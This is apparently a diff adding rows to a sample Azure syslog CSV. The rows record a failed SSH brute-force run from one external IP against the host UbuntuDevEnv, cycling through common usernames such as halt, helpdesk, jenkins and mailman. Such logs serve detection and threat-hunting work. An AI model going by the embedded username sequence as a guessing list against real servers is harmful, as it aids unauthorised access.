+2687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:32,UbuntuDevEnv,2019-06-28 05:19:31,auth,UbuntuDevEnv,info,Bad protocol version identification 'SSH-2.0_CoreLab-1.0' from 193.201.224.232 port 64519,94146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,64519,,
+2688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:38,UbuntuDevEnv,2019-06-28 05:19:37,auth,UbuntuDevEnv,info,Invalid user halt from 193.201.224.232 port 2136,94150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,halt,193.201.224.2,2136,,
+2689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:38,UbuntuDevEnv,2019-06-28 05:19:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:38,UbuntuDevEnv,2019-06-28 05:19:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:40,UbuntuDevEnv,2019-06-28 05:19:39,auth,UbuntuDevEnv,info,Failed password for invalid user halt from 193.201.224.232 port 2136 ssh2,94150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,halt,193.201.224.2,2136,,
+2692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:40,UbuntuDevEnv,2019-06-28 05:19:40,auth,UbuntuDevEnv,info,"Disconnecting invalid user halt 193.201.224.232 port 2136: Change of username or service not allowed: (halt,ssh-connection) -> (HELLO,ssh-connection) [preauth]",94150,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,halt,193.201.224.2,2136,,
+2693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:41,UbuntuDevEnv,2019-06-28 05:19:41,auth,UbuntuDevEnv,info,Invalid user HELLO from 193.201.224.232 port 11081,94181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,HELLO,193.201.224.2,11081,,
+2694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:41,UbuntuDevEnv,2019-06-28 05:19:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:41,UbuntuDevEnv,2019-06-28 05:19:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:44,UbuntuDevEnv,2019-06-28 05:19:43,auth,UbuntuDevEnv,info,Failed password for invalid user HELLO from 193.201.224.232 port 11081 ssh2,94181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,HELLO,193.201.224.2,11081,,
+2697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:44,UbuntuDevEnv,2019-06-28 05:19:43,auth,UbuntuDevEnv,info,"Disconnecting invalid user HELLO 193.201.224.232 port 11081: Change of username or service not allowed: (HELLO,ssh-connection) -> (helpdesk,ssh-connection) [preauth]",94181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,HELLO,193.201.224.2,11081,,
+2698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:45,UbuntuDevEnv,2019-06-28 05:19:44,auth,UbuntuDevEnv,info,Invalid user helpdesk from 193.201.224.232 port 38919,94195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,193.201.224.2,38919,,
+2699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:45,UbuntuDevEnv,2019-06-28 05:19:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:45,UbuntuDevEnv,2019-06-28 05:19:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:47,UbuntuDevEnv,2019-06-28 05:19:46,auth,UbuntuDevEnv,info,Failed password for invalid user helpdesk from 193.201.224.232 port 38919 ssh2,94195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,193.201.224.2,38919,,
+2702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:47,UbuntuDevEnv,2019-06-28 05:19:46,auth,UbuntuDevEnv,info,"Disconnecting invalid user helpdesk 193.201.224.232 port 38919: Change of username or service not allowed: (helpdesk,ssh-connection) -> (hscroot,ssh-connection) [preauth]",94195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,193.201.224.2,38919,,
+2703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:47,UbuntuDevEnv,2019-06-28 05:19:47,auth,UbuntuDevEnv,info,Invalid user hscroot from 193.201.224.232 port 42580,94203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hscroot,193.201.224.2,42580,,
+2704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:47,UbuntuDevEnv,2019-06-28 05:19:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:48,UbuntuDevEnv,2019-06-28 05:19:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:50,UbuntuDevEnv,2019-06-28 05:19:49,auth,UbuntuDevEnv,info,Failed password for invalid user hscroot from 193.201.224.232 port 42580 ssh2,94203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hscroot,193.201.224.2,42580,,
+2707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:53,UbuntuDevEnv,2019-06-28 05:19:52,auth,UbuntuDevEnv,info,"Disconnecting invalid user hscroot 193.201.224.232 port 42580: Change of username or service not allowed: (hscroot,ssh-connection) -> (info,ssh-connection) [preauth]",94203,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hscroot,193.201.224.2,42580,,
+2708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:54,UbuntuDevEnv,2019-06-28 05:19:53,auth,UbuntuDevEnv,info,Invalid user info from 193.201.224.232 port 49670,94226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,193.201.224.2,49670,,
+2709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:54,UbuntuDevEnv,2019-06-28 05:19:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:54,UbuntuDevEnv,2019-06-28 05:19:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:56,UbuntuDevEnv,2019-06-28 05:19:55,auth,UbuntuDevEnv,info,Failed password for invalid user info from 193.201.224.232 port 49670 ssh2,94226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,193.201.224.2,49670,,
+2712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:56,UbuntuDevEnv,2019-06-28 05:19:56,auth,UbuntuDevEnv,info,"Disconnecting invalid user info 193.201.224.232 port 49670: Change of username or service not allowed: (info,ssh-connection) -> (init,ssh-connection) [preauth]",94226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,193.201.224.2,49670,,
+2713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:59,UbuntuDevEnv,2019-06-28 05:19:59,auth,UbuntuDevEnv,info,Invalid user init from 193.201.224.232 port 55087,94240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,init,193.201.224.2,55087,,
+2714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:59,UbuntuDevEnv,2019-06-28 05:19:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:19:59,UbuntuDevEnv,2019-06-28 05:19:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:01,UbuntuDevEnv,2019-06-28 05:20:01,auth,UbuntuDevEnv,info,Failed password for invalid user init from 193.201.224.232 port 55087 ssh2,94240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,init,193.201.224.2,55087,,
+2717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:02,UbuntuDevEnv,2019-06-28 05:20:02,auth,UbuntuDevEnv,info,"Disconnecting invalid user init 193.201.224.232 port 55087: Change of username or service not allowed: (init,ssh-connection) -> (installer,ssh-connection) [preauth]",94240,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,init,193.201.224.2,55087,,
+2718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:04,UbuntuDevEnv,2019-06-28 05:20:03,auth,UbuntuDevEnv,info,Invalid user installer from 193.201.224.232 port 21599,94266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,installer,193.201.224.2,21599,,
+2719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:04,UbuntuDevEnv,2019-06-28 05:20:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:04,UbuntuDevEnv,2019-06-28 05:20:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:06,UbuntuDevEnv,2019-06-28 05:20:05,auth,UbuntuDevEnv,info,Failed password for invalid user installer from 193.201.224.232 port 21599 ssh2,94266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,installer,193.201.224.2,21599,,
+2722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:12,UbuntuDevEnv,2019-06-28 05:20:11,auth,UbuntuDevEnv,info,"Disconnecting invalid user installer 193.201.224.232 port 21599: Change of username or service not allowed: (installer,ssh-connection) -> (jenkins,ssh-connection) [preauth]",94266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,installer,193.201.224.2,21599,,
+2723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:14,UbuntuDevEnv,2019-06-28 05:20:13,auth,UbuntuDevEnv,info,Bad protocol version identification 'SSH-2.0_CoreLab-1.0' from 193.201.224.232 port 56279,94309,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,56279,,
+2724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:17,UbuntuDevEnv,2019-06-28 05:20:16,auth,UbuntuDevEnv,info,Invalid user jenkins from 193.201.224.232 port 57471,94311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,193.201.224.2,57471,,
+2725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:17,UbuntuDevEnv,2019-06-28 05:20:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:17,UbuntuDevEnv,2019-06-28 05:20:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:19,UbuntuDevEnv,2019-06-28 05:20:19,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 193.201.224.232 port 57471 ssh2,94311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,193.201.224.2,57471,,
+2728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:19,UbuntuDevEnv,2019-06-28 05:20:19,auth,UbuntuDevEnv,info,"Disconnecting invalid user jenkins 193.201.224.232 port 57471: Change of username or service not allowed: (jenkins,ssh-connection) -> (library,ssh-connection) [preauth]",94311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,193.201.224.2,57471,,
+2729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:20,UbuntuDevEnv,2019-06-28 05:20:20,auth,UbuntuDevEnv,info,Bad protocol version identification 'SSH-2.0_CoreLab-1.0' from 193.201.224.232 port 1983,94328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,1983,,
+2730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:24,UbuntuDevEnv,2019-06-28 05:20:23,auth,UbuntuDevEnv,info,Invalid user library from 193.201.224.232 port 3465,94337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,library,193.201.224.2,3465,,
+2731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:24,UbuntuDevEnv,2019-06-28 05:20:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:24,UbuntuDevEnv,2019-06-28 05:20:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:26,UbuntuDevEnv,2019-06-28 05:20:25,auth,UbuntuDevEnv,info,Failed password for invalid user library from 193.201.224.232 port 3465 ssh2,94337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,library,193.201.224.2,3465,,
+2734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:26,UbuntuDevEnv,2019-06-28 05:20:26,auth,UbuntuDevEnv,info,"Disconnecting invalid user library 193.201.224.232 port 3465: Change of username or service not allowed: (library,ssh-connection) -> (mailman,ssh-connection) [preauth]",94337,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,library,193.201.224.2,3465,,
+2735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:29,UbuntuDevEnv,2019-06-28 05:20:28,auth,UbuntuDevEnv,info,Invalid user mailman from 193.201.224.232 port 10527,94362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailman,193.201.224.2,10527,,
+2736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:29,UbuntuDevEnv,2019-06-28 05:20:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:29,UbuntuDevEnv,2019-06-28 05:20:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:30,UbuntuDevEnv,2019-06-28 05:20:30,auth,UbuntuDevEnv,info,Failed password for invalid user mailman from 193.201.224.232 port 10527 ssh2,94362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailman,193.201.224.2,10527,,
+2739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:33,UbuntuDevEnv,2019-06-28 05:20:32,auth,UbuntuDevEnv,info,"Disconnecting invalid user mailman 193.201.224.232 port 10527: Change of username or service not allowed: (mailman,ssh-connection) -> (manager,ssh-connection) [preauth]",94362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailman,193.201.224.2,10527,,
+2740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:33,UbuntuDevEnv,2019-06-28 05:20:33,auth,UbuntuDevEnv,info,Invalid user manager from 193.201.224.232 port 41090,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,41090,,
+2741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:33,UbuntuDevEnv,2019-06-28 05:20:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:33,UbuntuDevEnv,2019-06-28 05:20:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:35,UbuntuDevEnv,2019-06-28 05:20:34,auth,UbuntuDevEnv,info,Failed password for invalid user manager from 193.201.224.232 port 41090 ssh2,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,manager,193.201.224.2,41090,,
+2744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:20:35,UbuntuDevEnv,2019-06-28 05:20:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,94385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
